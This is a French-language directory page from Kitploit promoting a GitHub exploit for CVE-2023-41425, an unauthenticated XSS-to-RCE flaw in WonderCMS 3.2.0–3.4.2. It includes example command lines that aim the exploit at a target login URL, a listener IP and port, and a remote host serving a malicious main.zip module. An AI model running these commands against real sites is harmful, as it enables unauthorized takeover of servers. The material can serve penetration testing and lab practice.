Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/twappz/cve-2023-41425
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE pour WonderCMS versions v3.2.0 à v3.4.2

Les versions v3.2.0 à v3.4.2 de WonderCMS avec la vulnérabilité XSS permettent à un acteur malveillant d'atteindre une RCE en téléchargeant un composant vers installModule CVE-2023-41425 (Pas besoin de connaître le mot de passe).

Fonctionnalités:

  • Exploitation automatisée de CVE-2023-41425
  • Facilité de spécifier l'hôte distant à partir duquel le zip est téléchargé

Utilisation/Exemples

Spécifier l'hôte distant à partir duquel le fichier main.zip est téléchargé

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

OU sans spécifier le fichier main.zip. Par défaut, il le télécharge depuis main.zip

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

Captures d'écran

Useage Useage

🔗 Liens

Télécharger l’outil

my website youtube twitter instagram Hack the box